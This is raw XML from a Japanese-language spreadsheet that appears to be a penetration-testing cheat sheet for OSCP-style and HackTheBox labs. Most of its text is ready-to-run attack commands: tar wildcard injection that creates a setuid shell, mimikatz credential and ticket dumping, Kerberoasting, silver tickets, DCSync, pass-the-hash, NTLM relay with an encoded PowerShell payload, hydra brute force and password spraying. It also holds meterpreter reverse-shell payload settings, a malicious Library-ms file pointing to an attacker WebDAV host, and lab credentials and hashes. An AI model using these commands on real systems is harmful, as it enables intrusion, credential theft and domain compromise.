    <t>su root2</t>
  </si>
  <si>
    <t>Wildcard Injection</t>
  </si>
  <si>
    <t>echo "" &gt; "--checkpoint-action=exec=sh shell.sh"</t>
  </si>
  <si>
    <t>echo "" &gt; --checkpoint=1</t>
  </si>
  <si>
    <t>echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' &gt; /home/user/shell.sh</t>
  </si>
  <si>
    <t>/tmp/bash -p</t>
  </si>
  <si>
    <t>systemctl list-units --type=service --state=running</t>
  </si>
  <si>
    <t>サービス一覧出力</t>
  </si>
  <si>
    <t>ls -la /etc/cron*</t>
  </si>
  <si>
    <t>環境変数を見る(特にdocker)</t>
  </si>
  <si>
    <t>env</t>
  </si>
  <si>
    <t>FWの許可</t>
  </si>
  <si>
    <t>sudo iptables -P OUTPUT ACCEPT</t>
  </si>
  <si>
    <t>sudo iptables -L -n -v|grep -i ACCEPT</t>
  </si>
  <si>
    <t>RDPポートを開放する(Powershell)</t>
  </si>
  <si>
    <t>Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0</t>
  </si>
  <si>
    <t>New-NetFirewallRule -DisplayName 'RDP' -Profile 'Public' -Direction Inbound -Action Allow -Protocol TCP -LocalPort 3389</t>
  </si>
  <si>
    <t>shutdown -r -t 0</t>
  </si>
  <si>
    <t>RDPポートを開放する(CMD)</t>
  </si>
  <si>
    <t>reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f</t>
  </si>
  <si>
    <t>netsh advfirewall firewall set rule group="Remote Desktop" new enable=Yes</t>
  </si>
  <si>
    <t>System.Management.Automation.PSCredential</t>
  </si>
  <si>
    <t>$ss= Import-CliXml -Path admin.xml</t>
  </si>
  <si>
    <t>$ss.GetNetworkCredential().Password</t>
  </si>
  <si>
    <t>ASRoast</t>
  </si>
  <si>
    <t>.\Rubeus.exe asreproast /nowrap</t>
  </si>
  <si>
    <t>sudo impacket-GetNPUsers -dc-ip 192.168.220.70 -request -outputfile hashes.asreproast corp.com/pete:"Nexus123!"</t>
  </si>
  <si>
    <t>python3 GetNPUsers.py HTB.local/ -usersfile ~/OffsecVM/hackthebox/Forest/usernames.txt -format john -outputfile htb-forest.txt -no-pass -dc-ip 10.10.10.161</t>
  </si>
  <si>
    <t>Kerberoast</t>
  </si>
  <si>
    <t>.\Rubeus.exe kerberoast /outfile:hashes.kerberoast</t>
  </si>
  <si>
    <t>sudo date -s '2023-07-04 03:10:30'</t>
  </si>
  <si>
    <t>sudo impacket-GetUserSPNs -request -dc-ip 192.168.220.70 corp.com/pete:"Nexus123!" -outputfile hashes.kerberoast</t>
  </si>
  <si>
    <t>Sillver Ticket</t>
  </si>
  <si>
    <t>privilege::debug</t>
  </si>
  <si>
    <t>sekurlsa::logonpasswords</t>
  </si>
  <si>
    <t xml:space="preserve">         * Username : iis_service</t>
  </si>
  <si>
    <t xml:space="preserve">         * Domain   : CORP</t>
  </si>
  <si>
    <t xml:space="preserve">         * NTLM     : 4d28cf5252d39971419580a51484ca09</t>
  </si>
  <si>
    <t>whoami /user</t>
  </si>
  <si>
    <t xml:space="preserve">         *corp\jeff S-1-5-21-1987370270-658905905-1781884369-1105</t>
  </si>
  <si>
    <t>kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a51484ca09 /user:jeffadmin</t>
  </si>
  <si>
    <t>klist</t>
  </si>
  <si>
    <t>メモリダンプ</t>
  </si>
  <si>
    <t>.\mimikatz</t>
  </si>
  <si>
    <t>lsadump::sam</t>
  </si>
  <si>
    <t>token::elevate</t>
  </si>
  <si>
    <t>sekurlsa::tickets /export</t>
  </si>
  <si>
    <t>ハッシュのクラック</t>
  </si>
  <si>
    <t>Hash Analyzer</t>
  </si>
  <si>
    <t>hashcat -m 0 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force</t>
  </si>
  <si>
    <t>MD5</t>
  </si>
  <si>
    <t>hashcat -m 1000 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force</t>
  </si>
  <si>
    <t>ntlm</t>
  </si>
  <si>
    <t>hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force</t>
  </si>
  <si>
    <t>kerberoast</t>
  </si>
  <si>
    <t>hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force</t>
  </si>
  <si>
    <t>asreproast</t>
  </si>
  <si>
    <t>hashcat -m 1800 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force</t>
  </si>
  <si>
    <t>sha256</t>
  </si>
  <si>
    <t>hashcat -m 13400 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force</t>
  </si>
  <si>
    <t>keepass</t>
  </si>
  <si>
    <t>hashcat -m 5600 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force</t>
  </si>
  <si>
    <t>NetNTLMv2(Responder)</t>
  </si>
  <si>
    <t>hashcat -m 22921 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force</t>
  </si>
  <si>
    <t>ssh (sshng,ssh2john,sha512)</t>
  </si>
  <si>
    <t>hashcat -m 400 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force</t>
  </si>
  <si>
    <t>★$P$つきのmysqlパスワードハッシュ</t>
  </si>
  <si>
    <t>hashcat -m 3200 hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force</t>
  </si>
  <si>
    <t>bcrypt($2*)</t>
  </si>
  <si>
    <t>john --wordlist=/usr/share/wordlists/rockyou.txt hash</t>
  </si>
  <si>
    <t>john --format=Raw-MD5 hash --wordlist=/usr/share/wordlists/rockyou.txt</t>
  </si>
  <si>
    <t>john --format=NT hash --wordlist=/usr/share/wordlists/rockyou.txt</t>
  </si>
  <si>
    <t>ssh2john id_rsa &gt;user.hash</t>
  </si>
  <si>
    <t>keepass2john Database.kdbx &gt; keepass.hash</t>
  </si>
  <si>
    <t>crackstation.com</t>
  </si>
  <si>
    <t>hashes.com</t>
  </si>
  <si>
    <t>Net-NTLMv2</t>
  </si>
  <si>
    <t>sudo responder -I tun0</t>
  </si>
  <si>
    <t>secretsdump.py</t>
  </si>
  <si>
    <t>★NTLMv2を使ってwinrmからハッシュでリモートログインできるようです</t>
  </si>
  <si>
    <t>impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.50.212 -c "powershell -enc JABjAGwAaQBlAG4AdA..."</t>
  </si>
  <si>
    <t>パスワード総当たり攻撃</t>
  </si>
  <si>
    <t>hydra -L users.txt -P users.txt 192.168.233.157 ftp -t 64</t>
  </si>
  <si>
    <t>hydra -L users.txt -P passwords.txt 192.168.220.191 -t 4 rdp -V -t 64</t>
  </si>
  <si>
    <t>sudo hydra -l user -p password x.x.x.x http-post-form "/index.php:usr=^USER^&amp;pass=^PASS^:S=Login failed" -s 80 -t 64</t>
  </si>
  <si>
    <t>sudo hydra -l user -p password x.x.x.x https-post-form "/login:username=^USER^&amp;password=^PASS^:Invalid username" -s 443
 -t 64</t>
  </si>
  <si>
    <t>hydra -l "admin" -P pass.txt 192.168.225.201 http-get /</t>
  </si>
  <si>
    <t>★base認証</t>
  </si>
  <si>
    <t>https://github.com/vanhauser-thc/thc-hydra/blob/master/hydra-http-form.c</t>
  </si>
  <si>
    <t>DC Sync</t>
  </si>
  <si>
    <t>net group "Exchange Windows Permissions" john /add</t>
  </si>
  <si>
    <t>net localgroup "Remote Management Users" john /add</t>
  </si>
  <si>
    <t>Bypass-4MSI</t>
  </si>
  <si>
    <t>★evil-winrm使っている前提。-ep bypassと同様？</t>
  </si>
  <si>
    <t>$creds = New-Object System.Management.Automation.PSCredential('htb\john', $passwd)</t>
  </si>
  <si>
    <t>Add-DomainObjectAcl -PrincipalIdentity john -TargetIdentity "DC=htb,DC=local" -Credential $creds -Rights DCSync</t>
  </si>
  <si>
    <t xml:space="preserve">impacket-secretsdump htb.local/john:Password123\!@10.10.10.161 </t>
  </si>
  <si>
    <t>lsadump::dcsync /user:corp\Administrator</t>
  </si>
  <si>
    <t>★mimikatz</t>
  </si>
  <si>
    <t>shadow copy</t>
  </si>
  <si>
    <t>impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL</t>
  </si>
  <si>
    <t>impacket-secretsdump -sam SAM -system SYSTEM LOCAL</t>
  </si>
  <si>
    <t>SAM SYSTEM のreg ダウンロード（セキュリティ回避）</t>
  </si>
  <si>
    <t>reg save HKLM\SYSTEM C:\SYSTEM</t>
  </si>
  <si>
    <t>reg save HKLM\SYSTEM C:\SAM</t>
  </si>
  <si>
    <t>パスワード変更</t>
  </si>
  <si>
    <t>net user /domain robert Password123!</t>
  </si>
  <si>
    <t>runas /user:corp\robert powershell</t>
  </si>
  <si>
    <t>wordlist作成</t>
  </si>
  <si>
    <t>crunch 5 5 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890 -o wordlist.txt</t>
  </si>
  <si>
    <t>Pass The Hash</t>
  </si>
  <si>
    <t>smbclient \\\\192.168.50.212\\secrets -U Administrator --pw-nt-hash 7a38310ea6f0027ee955abed1762964b
dir
get secrets.txt</t>
  </si>
  <si>
    <t>impacket-wmiexec -hashes 00000000000000000000000000000000:7a38310ea6f0027ee955abed1762964b Administrator@192.168.50.212</t>
  </si>
  <si>
    <t>AD Enumeration</t>
  </si>
  <si>
    <t>net user /domain</t>
  </si>
  <si>
    <t>net user jeffadmin /domain</t>
  </si>
  <si>
    <t>net group /domain</t>
  </si>
  <si>
    <t>net group "Sales Department" /domain</t>
  </si>
  <si>
    <t>[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()</t>
  </si>
  <si>
    <t>Import-Module .\PowerView.ps1</t>
  </si>
  <si>
    <t>Get-NetDomain</t>
  </si>
  <si>
    <t>Get-NetUser</t>
  </si>
  <si>
    <t>Get-NetUser | select cn</t>
  </si>
  <si>
    <t>Get-NetUser | select cn,pwdlastset,lastlogon</t>
  </si>
  <si>
    <t>Get-NetGroup | select cn</t>
  </si>
  <si>
    <t>Get-NetGroup "Sales Department" | select member</t>
  </si>
  <si>
    <t>Get-NetComputer</t>
  </si>
  <si>
    <t>Get-NetComputer | select operatingsystem,dnshostname</t>
  </si>
  <si>
    <t>Find-LocalAdminAccess</t>
  </si>
  <si>
    <t>Get-NetSession -ComputerName files04 -Verbose</t>
  </si>
  <si>
    <t>Get-NetSession -ComputerName client74</t>
  </si>
  <si>
    <t>Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl</t>
  </si>
  <si>
    <t>BloodHound</t>
  </si>
  <si>
    <t>sudo neo4j start</t>
  </si>
  <si>
    <t>sudo bloodhound</t>
  </si>
  <si>
    <t>./SharpHound.exe</t>
  </si>
  <si>
    <t>Import-Module .\Sharphound.ps1</t>
  </si>
  <si>
    <t>Invoke-BloodHound -CollectionMethod All -OutputDirectory C:\Users\Public -OutputPrefix "result"</t>
  </si>
  <si>
    <t>MATCH (n:User)-[r:MemberOf*1..]-&gt;(g:Group) WHERE g.name = 'USERS@CORP.COM' RETURN n</t>
  </si>
  <si>
    <t>MATCH (n:User) RETURN n</t>
  </si>
  <si>
    <t>MATCH p = (c:Computer)-[:HasSession]-&gt;(m:User) RETURN p</t>
  </si>
  <si>
    <t>AD Latelall Movement</t>
  </si>
  <si>
    <t>C:\Windows\sysnative\klist.exe</t>
  </si>
  <si>
    <t>Git Dump</t>
  </si>
  <si>
    <t>git</t>
  </si>
  <si>
    <t>git show</t>
  </si>
  <si>
    <t>git log</t>
  </si>
  <si>
    <t>git show cb76c1ecaf99e1c135b28954a72cc587b1266fb1</t>
  </si>
  <si>
    <t>再帰的なファイルの探し方</t>
  </si>
  <si>
    <t>ls -R /usr | grep local.txt</t>
  </si>
  <si>
    <t>UDP通信などの確認</t>
  </si>
  <si>
    <t>netstat</t>
  </si>
  <si>
    <t>tcpdump -i ens192 udp -vvv</t>
  </si>
  <si>
    <t>Powershellからのポートスキャン</t>
  </si>
  <si>
    <t>1..1024 | % {echo ((New-Object Net.Sockets.TcpClient).Connect("192.168.50.151", $_)) "TCP port $_ is open"} 2&gt;$null</t>
  </si>
  <si>
    <t>Test-NetConnection -Port 445 192.168.50.151</t>
  </si>
  <si>
    <t>パスワードスプレー</t>
  </si>
  <si>
    <t>crackmapexec smb servers.txt -u users.txt -p passwords.txt --continue-on-success</t>
  </si>
  <si>
    <t>リモートアクセス</t>
  </si>
  <si>
    <t>impacket-psexec user:password@192.168.xx.xx</t>
  </si>
  <si>
    <t>impacket-psexec 'relia.com/Administrator:vau!XCKjNQBv2$@172.16.90.21'</t>
  </si>
  <si>
    <t xml:space="preserve">evil-winrm -i 10.10.109.142 -u celia.almeda -H e728ecbadfb02f51ce8eed753f3ff3fd   </t>
  </si>
  <si>
    <t>ssh user@192.168.xx.xx</t>
  </si>
  <si>
    <t>ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' user@172.16.xx.xx -i id_rsa</t>
  </si>
  <si>
    <t>Overpass the Hash</t>
  </si>
  <si>
    <t>sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell</t>
  </si>
  <si>
    <t>Pass The Ticket</t>
  </si>
  <si>
    <t>kerberos::ptt [0;12bd0]-0-0-40810000-dave@cifs-web04.kirbi</t>
  </si>
  <si>
    <t>ls \\web04\backup</t>
  </si>
  <si>
    <t>DCOM</t>
  </si>
  <si>
    <r>
      <t>$dcom.Document.ActiveView.ExecuteShellCommand("</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="メイリオ"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="メイリオ"/>
      </rPr>
      <t>",$null,"</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="メイリオ"/>
      </rPr>
      <t>/c calc</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="メイリオ"/>
      </rPr>
      <t>","7")</t>
    </r>
  </si>
  <si>
    <t>$dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"powershell -nop -w hidden -e JABjAXXXX","7")</t>
  </si>
  <si>
    <t>xfreerdp rdpファイルログイン</t>
  </si>
  <si>
    <t xml:space="preserve">xfreerdp cpub-SkylarkStatus-QuickSessionCollection-CmsRdsh.rdp /u:kiosk   </t>
  </si>
  <si>
    <t>xfreerdp ポート指定</t>
  </si>
  <si>
    <t>proxychains xfreerdp /u:desktop /p:Deskt0pTermin4L /v:172.168.152.30 /port:3390</t>
  </si>
  <si>
    <t>Abuse ReadGMSAPassword rights</t>
  </si>
  <si>
    <t xml:space="preserve">python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb             </t>
  </si>
  <si>
    <t>impacket-getST -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :a9081669a8930109e4cd3421fd0ab06a -impersonate administrator intelligence.htb/svc_int</t>
  </si>
  <si>
    <t>KRB5CCNAME=administrator.ccache wmiexec.py -k -no-pass administrator@dc.intelligence.htb</t>
  </si>
  <si>
    <t>始め方</t>
  </si>
  <si>
    <t>workspace -a pen200</t>
  </si>
  <si>
    <t>db_nmap -A 192.168.50.202</t>
  </si>
  <si>
    <t>hosts</t>
  </si>
  <si>
    <t>services</t>
  </si>
  <si>
    <t>search type:auxiliary smb</t>
  </si>
  <si>
    <t>vulns</t>
  </si>
  <si>
    <t>creds</t>
  </si>
  <si>
    <t>show payloads</t>
  </si>
  <si>
    <t>stageing→meterpreterへの切り替え</t>
  </si>
  <si>
    <t>use post/multi/manage/shell_to_meterpreter</t>
  </si>
  <si>
    <t>set SESSION 1</t>
  </si>
  <si>
    <t>run</t>
  </si>
  <si>
    <t>sessins -i 2</t>
  </si>
  <si>
    <t>background</t>
  </si>
  <si>
    <t>use post/multi/recon/local_exploit_suggester</t>
  </si>
  <si>
    <t>File Upload</t>
  </si>
  <si>
    <t xml:space="preserve">upload ~/Documents/exploit_tools/PowerUp.ps1 C:\\Users\\Public\\
</t>
  </si>
  <si>
    <t>msfvenom　meterpreter</t>
  </si>
  <si>
    <t>met.exe</t>
  </si>
  <si>
    <t>set payload windows/x64/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>met.aspx</t>
  </si>
  <si>
    <t>met.dll</t>
  </si>
  <si>
    <t>met.elf</t>
  </si>
  <si>
    <t>set payload linux/x64/meterpreter/reverse_tcp</t>
  </si>
  <si>
    <t>msfvenom　staged</t>
  </si>
  <si>
    <t>詳細表示</t>
  </si>
  <si>
    <t>set VERBOSE true</t>
  </si>
  <si>
    <t>プロセス番号の変更</t>
  </si>
  <si>
    <t>ps</t>
  </si>
  <si>
    <t xml:space="preserve"> PID   PPID  Name               Arch  Session  User                          Path</t>
  </si>
  <si>
    <t xml:space="preserve"> ---   ----  ----               ----  -------  ----                          ----</t>
  </si>
  <si>
    <t xml:space="preserve"> 1932  3900  cmd.exe            x86   0        NT AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\cmd.exe</t>
  </si>
  <si>
    <t>migrate 1932</t>
  </si>
  <si>
    <t>Payloadのエラーと変更</t>
  </si>
  <si>
    <t>Exploit failed: windows/meterpreter/reverse_tcp: All encoders failed to encode.</t>
  </si>
  <si>
    <t>set payload windows/shell/reverse_tcp_allports</t>
  </si>
  <si>
    <t>攻撃対象に配送するツールです</t>
  </si>
  <si>
    <t>chisel.exe</t>
  </si>
  <si>
    <t>mimikatz.exe</t>
  </si>
  <si>
    <t>powercat.ps1</t>
  </si>
  <si>
    <t>PowerView.ps1</t>
  </si>
  <si>
    <t>PowerUp.ps1</t>
  </si>
  <si>
    <t>PrintSpoofer64.exe</t>
  </si>
  <si>
    <t>winPEASx64.exe</t>
  </si>
  <si>
    <t>nc64.exe</t>
  </si>
  <si>
    <t>GodPotato-NET4.exe</t>
  </si>
  <si>
    <t>Rubeus.exe</t>
  </si>
  <si>
    <t>SharpHound.exe</t>
  </si>
  <si>
    <t>ligolo_agent.exe</t>
  </si>
  <si>
    <t>JuicyPotato.exe</t>
  </si>
  <si>
    <t>Invoke-PowerShellTcp.ps1</t>
  </si>
  <si>
    <t>chisel</t>
  </si>
  <si>
    <t>linpeas.sh</t>
  </si>
  <si>
    <t>pspy64</t>
  </si>
  <si>
    <t>busybox.sh</t>
  </si>
  <si>
    <t>PwnKit</t>
  </si>
  <si>
    <t>BaronSamedit.py</t>
  </si>
  <si>
    <t>dirty_pipe_2</t>
  </si>
  <si>
    <t>config.Library-ms</t>
  </si>
  <si>
    <t>&lt;?xml version="1.0" encoding="UTF-8"?&gt;
&lt;libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library"&gt;
&lt;name&gt;@windows.storage.dll,-34582&lt;/name&gt;
&lt;version&gt;6&lt;/version&gt;
&lt;isLibraryPinned&gt;true&lt;/isLibraryPinned&gt;
&lt;iconReference&gt;imageres.dll,-1003&lt;/iconReference&gt;
&lt;templateInfo&gt;
&lt;folderType&gt;{7d49d726-3c21-4f05-99aa-fdc2c9474656}&lt;/folderType&gt;
&lt;/templateInfo&gt;
&lt;searchConnectorDescriptionList&gt;
&lt;searchConnectorDescription&gt;
&lt;isDefaultSaveLocation&gt;true&lt;/isDefaultSaveLocation&gt;
&lt;isSupported&gt;false&lt;/isSupported&gt;
&lt;simpleLocation&gt;
&lt;url&gt;http://192.168.45.236&lt;/url&gt;
&lt;/simpleLocation&gt;
&lt;/searchConnectorDescription&gt;
&lt;/searchConnectorDescriptionList&gt;
&lt;/libraryDescription&gt;</t>
  </si>
  <si>
    <t>configuration.lnk</t>
  </si>
  <si>
    <t>mail</t>
  </si>
  <si>
    <t>Domain</t>
  </si>
  <si>
    <t>beyond.com</t>
  </si>
  <si>
    <t>To</t>
  </si>
  <si>
    <t>marcus</t>
  </si>
  <si>
    <t>From</t>
  </si>
  <si>
    <t>john</t>
  </si>
  <si>
    <t>mail server</t>
  </si>
  <si>
    <t>192.168.196.242</t>
  </si>
  <si>
    <t>Webdav Server</t>
  </si>
  <si>
    <t>自作した補助ツールです</t>
  </si>
  <si>
    <t>encypto.py</t>
  </si>
  <si>
    <t>portscan.ps1</t>
  </si>
  <si>
    <t>Target IP</t>
  </si>
  <si>
    <t>172.16.90.21</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;?php
require 'PasswordHash.php';
$plain_password = 'a';
$hasher = new PasswordHash(8, false);
$hashed_password = $hasher-&gt;HashPassword($plain_password);
echo $hashed_password;
?&gt;
</t>
  </si>
  <si>
    <t>連続実行</t>
  </si>
  <si>
    <t>for i in {1..60}; do nc -U /tmp/s; sleep 2; done</t>
  </si>
  <si>
    <t>for i in {1..60}; do nc -U /tmp/s 2&gt;/dev/null; sleep 2; done</t>
  </si>
  <si>
    <t>echo "/bin/sh" &gt; /tmp/cmd</t>
  </si>
  <si>
    <t>sudo ip -force -batch /tmp/cmd</t>
  </si>
  <si>
    <t>セッション全削除</t>
  </si>
  <si>
    <t>tmux kill-server</t>
  </si>
  <si>
    <t>今のpaneに2のpaneを組み込む</t>
  </si>
  <si>
    <t>join-pane -s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</si>
</sst>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ＭＳ Ｐゴシック"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="Meiryo UI"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF1F2328"/>
      <name val="Ui-Monospace"/>
      <charset val="1"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="ＭＳ Ｐゴシック"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="1"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color theme="1"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <sz val="10"/>
      <color theme="1"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF1F2328"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <u/>
      <sz val="11"/>
      <color theme="10"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <b/>
      <sz val="10"/>
      <color theme="1"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF343541"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <sz val="12"/>
      <color rgb="FF242424"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF000000"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF111827"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <b/>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF000000"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF374151"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <sz val="11"/>
      <color theme="10"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF111827"/>
      <name val="Söhne Mono"/>
      <charset val="1"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF343541"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <sz val="11"/>
      <color rgb="FF3A4F66"/>
      <name val="メイリオ"/>
    </font>
    <font>
      <sz val="10"/>
      <color rgb="FF3A4F66"/>
      <name val="Var(--FontFamily)"/>
      <charset val="1"/>
    </font>
    <font>
      <b/>
      <sz val="12"/>
      <color rgb="FF374151"/>
      <name val="Söhn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quotePrefix="1" applyFont="1"/>
    <xf numFmtId="0" fontId="6" fillId="0" borderId="0" xfId="0" quotePrefix="1" applyFont="1"/>
    <xf numFmtId="0" fontId="8" fillId="0" borderId="0" xfId="1" applyFo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5" fillId="0" borderId="0" xfId="0" quotePrefix="1" applyFont="1"/>
    <xf numFmtId="0" fontId="7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4" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="22" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="3" fillId="0" borderId="0" xfId="1"/>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top"/>
    </xf>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="0" applyFont="1"/>
    <xf numFmtId="0" fontId="1" fillId="0" borderId="0" xfId="0" quotePrefix="1" applyFont="1"/>
    <xf numFmtId="0" fontId="15" fillId="0" borderId="0" xfId="1" applyFont="1" applyAlignment="1">
      <alignment horizontal="left" vertical="top" wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="17" fillId="0" borderId="0" xfId="1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vanhauser-thc/thc-hydra/blob/master/hydra-http-form.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egre55/c058744a4240af6515eb32b2d33fbed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ruanbekker.com/blog/2018/02/11/setup-a-site-to-site-ipsec-vpn-with-strongswan-and-preshared-key-authenticatio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hpe/juicy-potato/tree/master/CLS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3F89-6611-4355-AAB3-22EBDEC41BF4}">
  <dimension ref="B2:B8"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="B2" sqref="B2"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultRowHeight="13.5"/>
  <sheetData>
    <row r="2" spans="2:2">
      <c r="B2" t="s">
        <v>0</v>
      </c>
    </row>
    <row r="5" spans="2:2">
      <c r="B5" t="s">
        <v>1</v>
      </c>
    </row>
    <row r="8" spans="2:2">
      <c r="B8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1FC9-F9A7-40B5-9A1D-3E40B6806AE1}">
  <dimension ref="B2:N103"/>
  <sheetViews>
    <sheetView topLeftCell="A50" workbookViewId="0">
      <selection activeCell="T31" sqref="T31"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="18.75"/>
  <cols>
    <col min="1" max="1" width="9" style="3"/>
    <col min="2" max="2" width="36.625" style="3" bestFit="1" customWidth="1"/>
    <col min="3" max="3" width="13.375" style="3" customWidth="1"/>
    <col min="4" max="16384" width="9" style="3"/>
  </cols>
  <sheetData>
    <row r="2" spans="2:9">
      <c r="B2" s="3" t="s">
        <v>48</v>
      </c>
    </row>
    <row r="4" spans="2:9">
      <c r="B4" s="3" t="s">
        <v>4</v>
      </c>
      <c r="C4" s="3" t="str">
        <f>'1. Reconnaissance'!C4</f>
        <v>10.10.16.4</v>
      </c>
      <c r="E4" s="3" t="str">
        <f>'1. Reconnaissance'!E4</f>
        <v>username</v>
      </c>
      <c r="F4" s="3" t="str">
        <f>'1. Reconnaissance'!F4</f>
        <v>Tiffany.Molina</v>
      </c>
      <c r="H4" s="3" t="str">
        <f>'1. Reconnaissance'!H4</f>
        <v>password</v>
      </c>
      <c r="I4" s="3" t="str">
        <f>'1. Reconnaissance'!I4</f>
        <v>'NewIntelligenceCorpUser9876'</v>
      </c>
    </row>
    <row r="5" spans="2:9">
      <c r="B5" s="3" t="str">
        <f>'1. Reconnaissance'!B5</f>
        <v>IP(target)</v>
      </c>
      <c r="C5" s="3" t="str">
        <f>'1. Reconnaissance'!C5</f>
        <v>10.10.10.248</v>
      </c>
      <c r="E5" s="3" t="str">
        <f>'1. Reconnaissance'!E5</f>
        <v>domain</v>
      </c>
      <c r="F5" s="3" t="str">
        <f>'1. Reconnaissance'!F5</f>
        <v>intelligence.htb</v>
      </c>
    </row>
    <row r="6" spans="2:9">
      <c r="B6" s="10"/>
    </row>
    <row r="7" spans="2:9">
      <c r="B7" s="4" t="s">
        <v>321</v>
      </c>
    </row>
    <row r="8" spans="2:9">
      <c r="B8" s="3" t="s">
        <v>322</v>
      </c>
    </row>
    <row r="9" spans="2:9">
      <c r="B9" s="3" t="s">
        <v>323</v>
      </c>
    </row>
    <row r="10" spans="2:9">
      <c r="B10" s="3" t="str">
        <f>"sudo impacket-GetNPUsers -dc-ip "&amp;$C$5&amp;" -no-pass "&amp;$F$5&amp;"/"&amp;$F$4</f>
        <v>sudo impacket-GetNPUsers -dc-ip 10.10.10.248 -no-pass intelligence.htb/Tiffany.Molina</v>
      </c>
    </row>
    <row r="11" spans="2:9">
      <c r="B11" s="3" t="s">
        <v>324</v>
      </c>
    </row>
    <row r="13" spans="2:9">
      <c r="B13" s="4" t="s">
        <v>325</v>
      </c>
    </row>
    <row r="14" spans="2:9">
      <c r="B14" s="3" t="s">
        <v>326</v>
      </c>
    </row>
    <row r="15" spans="2:9">
      <c r="B15" s="3" t="s">
        <v>327</v>
      </c>
    </row>
    <row r="16" spans="2:9">
      <c r="B16" s="3" t="s">
        <v>328</v>
      </c>
    </row>
    <row r="18" spans="2:2">
      <c r="B18" s="4" t="s">
        <v>329</v>
      </c>
    </row>
    <row r="19" spans="2:2">
      <c r="B19" s="3" t="s">
        <v>330</v>
      </c>
    </row>
    <row r="20" spans="2:2">
      <c r="B20" s="3" t="s">
        <v>331</v>
      </c>
    </row>
    <row r="21" spans="2:2">
      <c r="B21" s="5" t="s">
        <v>332</v>
      </c>
    </row>
    <row r="22" spans="2:2">
      <c r="B22" s="5" t="s">
        <v>333</v>
